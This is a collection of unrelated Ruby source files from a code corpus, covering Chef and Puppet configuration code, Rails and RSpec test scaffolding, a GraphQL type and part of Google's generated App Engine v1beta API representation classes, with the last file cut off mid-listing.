def duration(seconds, suffix = nil)
return "none" if seconds.nil?
seconds = (Time.now - seconds).to_i if seconds.is_a? Time
output = []
minutes, seconds = seconds.divmod(60)
hours, minutes = minutes.divmod(60)
output << "#{hours } hrs" if hours > 0
output << "#{minutes} min" if minutes > 0
output << "#{seconds} sec" if seconds > 0 or output.empty?
output << suffix if suffix
output.join(" ")
end
def file_size(input, human = true)
return "#{input} B" unless human
format = "B"
iec = %w[KiB MiB GiB TiB PiB EiB ZiB YiB]
while human and input > 512 and iec.any?
input /= 1024.0
format = iec.shift
end
input = input.round(2) if input.is_a? Float
"#{input} #{format}"
end
def time(time)
return "not yet" if time.nil? # or time > Time.now
#return duration(time, "ago") if Time.now - time < DAY
time.localtime.strftime(TIME_FORMAT)
end
def job_config(config)
output = []
config.each_pair do |key, value|
output << "#{key}: #{value}" if CONFIG_KEYS.include? key
end
output.join(", ")
end
end
end
end
| 31.56 | 130 | 0.529785 |
1d4c4292e5588dadc020f9ac54ce94f5334b71c6
| 961 |
#
# Author:: Panagiotis Papadomitsos (<[email protected]>)
#
# Cookbook Name:: php
# Recipe:: module_xml
#
# Copyright 2009-2012, Panagiotis Papadomitsos
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
case node['platform_family']
when 'debian'
%w{ xmlrpc xsl }.each do |pkg|
package "php5-#{pkg}" do
action :install
end
end
when 'rhel', 'fedora'
%w{ xml xmlrpc }.each do |pkg|
package "php-#{pkg}" do
action :install
end
end
end
| 26.694444 | 74 | 0.707596 |
bf1e219804b846f749c5414410a0984fcae001f3
| 4,888 |
# Copyright 2011 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# A grant is either global or per-db. This can be distinguished by the syntax
# of the name:
# user@host => global
# user@host/db => per-db
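# For example (illustrative names), split_name below maps:
#   'deploy@localhost'       => { :type => :user, :user => 'deploy', :host => 'localhost' }
#   'deploy@localhost/appdb' => { :type => :db, :user => 'deploy', :host => 'localhost', :db => 'appdb' }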
require 'puppet/provider/package'
MYSQL_USER_PRIVS = [ :select_priv, :insert_priv, :update_priv, :delete_priv,
:create_priv, :drop_priv, :reload_priv, :shutdown_priv, :process_priv,
:file_priv, :grant_priv, :references_priv, :index_priv, :alter_priv,
:show_db_priv, :super_priv, :create_tmp_table_priv, :lock_tables_priv,
:execute_priv, :repl_slave_priv, :repl_client_priv, :create_view_priv,
:show_view_priv, :create_routine_priv, :alter_routine_priv,
:create_user_priv
]
MYSQL_DB_PRIVS = [ :select_priv, :insert_priv, :update_priv, :delete_priv,
:create_priv, :drop_priv, :grant_priv, :references_priv, :index_priv,
:alter_priv, :create_tmp_table_priv, :lock_tables_priv, :create_view_priv,
:show_view_priv, :create_routine_priv, :alter_routine_priv, :execute_priv
]
Puppet::Type.type(:mysql_grant).provide(:mysql) do
desc "Uses mysql as database."
commands :mysql => '/usr/bin/mysql'
commands :mysqladmin => '/usr/bin/mysqladmin'
def mysql_flush
mysqladmin "flush-privileges"
end
# Parses a grant name of the form user@host (global) or user@host/db (per-db).
def split_name(string)
matches = /^([^@]*)@([^\/]*)(\/(.*))?$/.match(string).captures.compact
case matches.length
when 2
{
:type => :user,
:user => matches[0],
:host => matches[1]
}
when 4
{
:type => :db,
:user => matches[0],
:host => matches[1],
:db => matches[3]
}
end
end
def create_row
unless @resource.should(:privileges).empty?
name = split_name(@resource[:name])
case name[:type]
when :user
mysql "mysql", "-e", "INSERT INTO user (host, user) VALUES ('%s', '%s')" % [
name[:host], name[:user],
]
when :db
mysql "mysql", "-e", "INSERT INTO db (host, user, db) VALUES ('%s', '%s', '%s')" % [
name[:host], name[:user], name[:db],
]
end
mysql_flush
end
end
def destroy
name = split_name(@resource[:name])
mysql "mysql", "-e", "REVOKE ALL PRIVILEGES ON %s.* FROM '%s'@'%s'" % [ name[:db] || '*', name[:user], name[:host] ]
end
def row_exists?
name = split_name(@resource[:name])
fields = [:user, :host]
if name[:type] == :db
fields << :db
end
not mysql( "mysql", "-NBe", 'SELECT "1" FROM %s WHERE %s' % [ name[:type], fields.map do |f| "%s = '%s'" % [f, name[f]] end.join(' AND ')]).empty?
end
def all_privs_set?
all_privs = case split_name(@resource[:name])[:type]
when :user
MYSQL_USER_PRIVS
when :db
MYSQL_DB_PRIVS
end
all_privs = all_privs.collect do |p| p.to_s end.sort.join("|")
privs = privileges.collect do |p| p.to_s end.sort.join("|")
all_privs == privs
end
def privileges
name = split_name(@resource[:name])
privs = ""
case name[:type]
when :user
privs = mysql "mysql", "-Be", 'select * from user where user="%s" and host="%s"' % [ name[:user], name[:host] ]
when :db
privs = mysql "mysql", "-Be", 'select * from db where user="%s" and host="%s" and db="%s"' % [ name[:user], name[:host], name[:db] ]
end
if privs.match(/^$/)
privs = [] # no result, no privs
else
# returns a line with field names and a line with values, each tab-separated
privs = privs.split(/\n/).map! do |l| l.chomp.split(/\t/) end
# transpose the lines, so we have key/value pairs
privs = privs[0].zip(privs[1])
privs = privs.select do |p| p[0].match(/_priv$/) and p[1] == 'Y' end
end
privs.collect do |p| symbolize(p[0].downcase) end
end
def privileges=(privs)
unless row_exists?
create_row
end
# puts "Setting privs: ", privs.join(", ")
name = split_name(@resource[:name])
stmt = ''
where = ''
all_privs = []
case name[:type]
when :user
stmt = 'update user set '
where = ' where user="%s" and host="%s"' % [ name[:user], name[:host] ]
all_privs = MYSQL_USER_PRIVS
when :db
stmt = 'update db set '
where = ' where user="%s" and host="%s"' % [ name[:user], name[:host] ]
all_privs = MYSQL_DB_PRIVS
end
if privs[0] == :all
privs = all_privs
end
# puts "stmt:", stmt
set = all_privs.collect do |p| "%s = '%s'" % [p, privs.include?(p) ? 'Y' : 'N'] end.join(', ')
# puts "set:", set
stmt = stmt << set << where
mysql "mysql", "-Be", stmt
mysql_flush
end
end
| 28.923077 | 148 | 0.63973 |
91501275b22a72a12185ab8bd96be000a8f88774
| 659 |
# Be sure to restart your server when you modify this file.
# Your secret key is used for verifying the integrity of signed cookies.
# If you change this key, all old signed cookies will become invalid!
# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
# You can use `rake secret` to generate a secure secret key.
# Make sure your secret_key_base is kept private
# if you're sharing your code publicly.
Dummy::Application.config.secret_key_base = '5848a329518684b6079c5ad1450d459fd6f273f0804e39a0bc5d45e43624f8b7e06f11051184f75e14a8e7c980553a94897eabfabf61cbafb4a07e832fb5aa3e'
| 50.692308 | 174 | 0.814871 |
389e21f32f00928d792f2c023705b0504185fe4e
| 2,214 |
#
# Cookbook:: _pipeline
# Resource:: build_cookbook
#
# Copyright:: 2017, Nathan Cerny
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
resource_name 'build_cookbook'
default_action :create
property :name, String, name_property: true
property :cwd, String, required: true
property :git_branch, [Symbol, String], default: :master
alias :branch :git_branch
load_current_value do
# node.run_state['chef-users'] ||= Mixlib::ShellOut.new('chef-server-ctl user-list').run_command.stdout
# current_value_does_not_exist! unless node.run_state['chef-users'].index(/^#{username}$/)
end
action :create do
directory "#{new_resource.cwd}/.delivery/build_cookbook/recipes" do
recursive true
action :create
owner 'dbuild'
group 'dbuild'
end
%w(default deploy functional lint provision publish quality security smoke syntax unit).each do |phase|
template "#{new_resource.cwd}/.delivery/build_cookbook/recipes/#{phase}.rb" do
source 'recipe.erb'
owner 'dbuild'
group 'dbuild'
variables phase: phase
end
end
%w(chefignore LICENSE metadata.rb Berksfile).each do |f|
cookbook_file "#{new_resource.cwd}/.delivery/build_cookbook/#{f}" do
source f
owner 'dbuild'
group 'dbuild'
end
end
%w(config.json project.toml).each do |f|
cookbook_file "#{new_resource.cwd}/.delivery/#{f}" do
source f
owner 'dbuild'
group 'dbuild'
end
end
execute "#{new_resource.name} :: Commit build cookbook" do
command <<-EOF
git add .delivery
git commit -m 'Update Automate Workflow build_cookbook'
EOF
cwd "#{new_resource.cwd}/#{new_resource.name}"
only_if { new_resource.resource_updated? }
end
end
| 29.52 | 105 | 0.712285 |
26997923b3a533f4438e04d651128d2c1f6a0f9e
| 868 |
require 'spec_helper'
describe ABSTRACT(:refresh_token) do
it do
ABSTRACT(:refresh_token).table_name.should == ABSTRACT(:refresh_token_plur).to_s
end
describe 'basic refresh token instance' do
with :client
subject do
ABSTRACT(:refresh_token).create! ABSTRACT(:client_sym) => client
end
it { should validate_presence_of :token }
it { should validate_uniqueness_of :token }
it { should belong_to :user }
it { should belong_to ABSTRACT(:client_sym) }
it { should validate_presence_of ABSTRACT(:client_sym) }
it { should validate_presence_of :expires_at }
it { should have_many ABSTRACT(:access_token_plur) }
it { should have_db_index ABSTRACT(:client_sym_id) }
it { should have_db_index :user_id }
it { should have_db_index(:token).unique(true) }
it { should have_db_index :expires_at }
end
end
| 33.384615 | 84 | 0.718894 |
26f4736ebe5b6c3104d277b8756b6f89c3e033ee
| 151 |
Types::VideoType = GraphQL::ObjectType.define do
name "Video"
field :id, types.ID
field :title, types.String
field :watched, types.Boolean
end
| 21.571429 | 48 | 0.728477 |
6a2d8c496ffdb3194b1a31c4eab39c270bbc21ae
| 48,578 |
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module AppengineV1beta
class ApiConfigHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ApiEndpointHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Application
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AuthorizedCertificate
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AuthorizedDomain
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class AutomaticScaling
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BasicScaling
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BatchUpdateIngressRulesRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BatchUpdateIngressRulesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class BuildInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CertificateRawData
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CloudBuildOptions
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ContainerInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CpuUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CreateVersionMetadataV1
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CreateVersionMetadataV1Alpha
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CreateVersionMetadataV1Beta
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class CustomMetric
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class DebugInstanceRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Deployment
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class DiskUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class DomainMapping
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Empty
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class EndpointsApiService
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Entrypoint
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ErrorHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FeatureSettings
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FileInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FirewallRule
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class HealthCheck
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class IdentityAwareProxy
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Instance
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Library
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListAuthorizedCertificatesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListAuthorizedDomainsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListDomainMappingsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListIngressRulesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListInstancesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListLocationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListOperationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListServicesResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListVersionsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class LivenessCheck
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Location
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class LocationMetadata
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ManagedCertificate
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ManualScaling
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Network
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class NetworkUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OAuth2ClientInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Operation
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadata
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1Alpha
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1Beta
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OperationMetadataV1Beta5
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ReadinessCheck
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class RepairApplicationRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class RequestUtilization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ResourceRecord
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Resources
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ScriptHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Service
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class SslSettings
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class StandardSchedulerSettings
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class StaticFilesHandler
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Status
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TrafficSplit
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class UrlDispatchRule
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class UrlMap
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Version
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Volume
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class VpcAccessConnector
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ZipInfo
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ApiConfigHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :auth_fail_action, as: 'authFailAction'
property :login, as: 'login'
property :script, as: 'script'
property :security_level, as: 'securityLevel'
property :url, as: 'url'
end
end
class ApiEndpointHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :script_path, as: 'scriptPath'
end
end
class Application
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :auth_domain, as: 'authDomain'
property :code_bucket, as: 'codeBucket'
property :default_bucket, as: 'defaultBucket'
property :default_cookie_expiration, as: 'defaultCookieExpiration'
property :default_hostname, as: 'defaultHostname'
collection :dispatch_rules, as: 'dispatchRules', class: Google::Apis::AppengineV1beta::UrlDispatchRule, decorator: Google::Apis::AppengineV1beta::UrlDispatchRule::Representation
property :feature_settings, as: 'featureSettings', class: Google::Apis::AppengineV1beta::FeatureSettings, decorator: Google::Apis::AppengineV1beta::FeatureSettings::Representation
property :gcr_domain, as: 'gcrDomain'
property :iap, as: 'iap', class: Google::Apis::AppengineV1beta::IdentityAwareProxy, decorator: Google::Apis::AppengineV1beta::IdentityAwareProxy::Representation
property :id, as: 'id'
property :location_id, as: 'locationId'
property :name, as: 'name'
property :serving_status, as: 'servingStatus'
end
end
class AuthorizedCertificate
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :certificate_raw_data, as: 'certificateRawData', class: Google::Apis::AppengineV1beta::CertificateRawData, decorator: Google::Apis::AppengineV1beta::CertificateRawData::Representation
property :display_name, as: 'displayName'
property :domain_mappings_count, as: 'domainMappingsCount'
collection :domain_names, as: 'domainNames'
property :expire_time, as: 'expireTime'
property :id, as: 'id'
property :managed_certificate, as: 'managedCertificate', class: Google::Apis::AppengineV1beta::ManagedCertificate, decorator: Google::Apis::AppengineV1beta::ManagedCertificate::Representation
property :name, as: 'name'
collection :visible_domain_mappings, as: 'visibleDomainMappings'
end
end
class AuthorizedDomain
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :id, as: 'id'
property :name, as: 'name'
end
end
class AutomaticScaling
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cool_down_period, as: 'coolDownPeriod'
property :cpu_utilization, as: 'cpuUtilization', class: Google::Apis::AppengineV1beta::CpuUtilization, decorator: Google::Apis::AppengineV1beta::CpuUtilization::Representation
collection :custom_metrics, as: 'customMetrics', class: Google::Apis::AppengineV1beta::CustomMetric, decorator: Google::Apis::AppengineV1beta::CustomMetric::Representation
property :disk_utilization, as: 'diskUtilization', class: Google::Apis::AppengineV1beta::DiskUtilization, decorator: Google::Apis::AppengineV1beta::DiskUtilization::Representation
property :max_concurrent_requests, as: 'maxConcurrentRequests'
property :max_idle_instances, as: 'maxIdleInstances'
property :max_pending_latency, as: 'maxPendingLatency'
property :max_total_instances, as: 'maxTotalInstances'
property :min_idle_instances, as: 'minIdleInstances'
property :min_pending_latency, as: 'minPendingLatency'
property :min_total_instances, as: 'minTotalInstances'
property :network_utilization, as: 'networkUtilization', class: Google::Apis::AppengineV1beta::NetworkUtilization, decorator: Google::Apis::AppengineV1beta::NetworkUtilization::Representation
property :request_utilization, as: 'requestUtilization', class: Google::Apis::AppengineV1beta::RequestUtilization, decorator: Google::Apis::AppengineV1beta::RequestUtilization::Representation
property :standard_scheduler_settings, as: 'standardSchedulerSettings', class: Google::Apis::AppengineV1beta::StandardSchedulerSettings, decorator: Google::Apis::AppengineV1beta::StandardSchedulerSettings::Representation
end
end
class BasicScaling
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :idle_timeout, as: 'idleTimeout'
property :max_instances, as: 'maxInstances'
end
end
class BatchUpdateIngressRulesRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ingress_rules, as: 'ingressRules', class: Google::Apis::AppengineV1beta::FirewallRule, decorator: Google::Apis::AppengineV1beta::FirewallRule::Representation
end
end
class BatchUpdateIngressRulesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ingress_rules, as: 'ingressRules', class: Google::Apis::AppengineV1beta::FirewallRule, decorator: Google::Apis::AppengineV1beta::FirewallRule::Representation
end
end
class BuildInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CertificateRawData
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :private_key, as: 'privateKey'
property :public_certificate, as: 'publicCertificate'
end
end
class CloudBuildOptions
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :app_yaml_path, as: 'appYamlPath'
property :cloud_build_timeout, as: 'cloudBuildTimeout'
end
end
class ContainerInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :image, as: 'image'
end
end
class CpuUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :aggregation_window_length, as: 'aggregationWindowLength'
property :target_utilization, as: 'targetUtilization'
end
end
class CreateVersionMetadataV1
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CreateVersionMetadataV1Alpha
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CreateVersionMetadataV1Beta
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cloud_build_id, as: 'cloudBuildId'
end
end
class CustomMetric
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :filter, as: 'filter'
property :metric_name, as: 'metricName'
property :single_instance_assignment, as: 'singleInstanceAssignment'
property :target_type, as: 'targetType'
property :target_utilization, as: 'targetUtilization'
end
end
class DebugInstanceRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :ssh_key, as: 'sshKey'
end
end
class Deployment
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :build, as: 'build', class: Google::Apis::AppengineV1beta::BuildInfo, decorator: Google::Apis::AppengineV1beta::BuildInfo::Representation
property :cloud_build_options, as: 'cloudBuildOptions', class: Google::Apis::AppengineV1beta::CloudBuildOptions, decorator: Google::Apis::AppengineV1beta::CloudBuildOptions::Representation
property :container, as: 'container', class: Google::Apis::AppengineV1beta::ContainerInfo, decorator: Google::Apis::AppengineV1beta::ContainerInfo::Representation
hash :files, as: 'files', class: Google::Apis::AppengineV1beta::FileInfo, decorator: Google::Apis::AppengineV1beta::FileInfo::Representation
property :zip, as: 'zip', class: Google::Apis::AppengineV1beta::ZipInfo, decorator: Google::Apis::AppengineV1beta::ZipInfo::Representation
end
end
class DiskUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :target_read_bytes_per_second, as: 'targetReadBytesPerSecond'
property :target_read_ops_per_second, as: 'targetReadOpsPerSecond'
property :target_write_bytes_per_second, as: 'targetWriteBytesPerSecond'
property :target_write_ops_per_second, as: 'targetWriteOpsPerSecond'
end
end
class DomainMapping
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :id, as: 'id'
property :name, as: 'name'
collection :resource_records, as: 'resourceRecords', class: Google::Apis::AppengineV1beta::ResourceRecord, decorator: Google::Apis::AppengineV1beta::ResourceRecord::Representation
property :ssl_settings, as: 'sslSettings', class: Google::Apis::AppengineV1beta::SslSettings, decorator: Google::Apis::AppengineV1beta::SslSettings::Representation
end
end
class Empty
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class EndpointsApiService
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :config_id, as: 'configId'
property :disable_trace_sampling, as: 'disableTraceSampling'
property :name, as: 'name'
property :rollout_strategy, as: 'rolloutStrategy'
end
end
class Entrypoint
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :shell, as: 'shell'
end
end
class ErrorHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :error_code, as: 'errorCode'
property :mime_type, as: 'mimeType'
property :static_file, as: 'staticFile'
end
end
class FeatureSettings
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :split_health_checks, as: 'splitHealthChecks'
property :use_container_optimized_os, as: 'useContainerOptimizedOs'
end
end
class FileInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :mime_type, as: 'mimeType'
property :sha1_sum, as: 'sha1Sum'
property :source_url, as: 'sourceUrl'
end
end
class FirewallRule
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :action, as: 'action'
property :description, as: 'description'
property :priority, as: 'priority'
property :source_range, as: 'sourceRange'
end
end
class HealthCheck
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :check_interval, as: 'checkInterval'
property :disable_health_check, as: 'disableHealthCheck'
property :healthy_threshold, as: 'healthyThreshold'
property :host, as: 'host'
property :restart_threshold, as: 'restartThreshold'
property :timeout, as: 'timeout'
property :unhealthy_threshold, as: 'unhealthyThreshold'
end
end
class IdentityAwareProxy
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :enabled, as: 'enabled'
property :oauth2_client_id, as: 'oauth2ClientId'
property :oauth2_client_info, as: 'oauth2ClientInfo', class: Google::Apis::AppengineV1beta::OAuth2ClientInfo, decorator: Google::Apis::AppengineV1beta::OAuth2ClientInfo::Representation
property :oauth2_client_secret, as: 'oauth2ClientSecret'
property :oauth2_client_secret_sha256, as: 'oauth2ClientSecretSha256'
end
end
class Instance
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :app_engine_release, as: 'appEngineRelease'
property :availability, as: 'availability'
property :average_latency, as: 'averageLatency'
property :errors, as: 'errors'
property :id, as: 'id'
property :memory_usage, :numeric_string => true, as: 'memoryUsage'
property :name, as: 'name'
property :qps, as: 'qps'
property :requests, as: 'requests'
property :start_time, as: 'startTime'
property :vm_debug_enabled, as: 'vmDebugEnabled'
property :vm_id, as: 'vmId'
property :vm_ip, as: 'vmIp'
property :vm_name, as: 'vmName'
property :vm_status, as: 'vmStatus'
property :vm_zone_name, as: 'vmZoneName'
end
end
class Library
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
property :version, as: 'version'
end
end
class ListAuthorizedCertificatesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :certificates, as: 'certificates', class: Google::Apis::AppengineV1beta::AuthorizedCertificate, decorator: Google::Apis::AppengineV1beta::AuthorizedCertificate::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListAuthorizedDomainsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :domains, as: 'domains', class: Google::Apis::AppengineV1beta::AuthorizedDomain, decorator: Google::Apis::AppengineV1beta::AuthorizedDomain::Representation
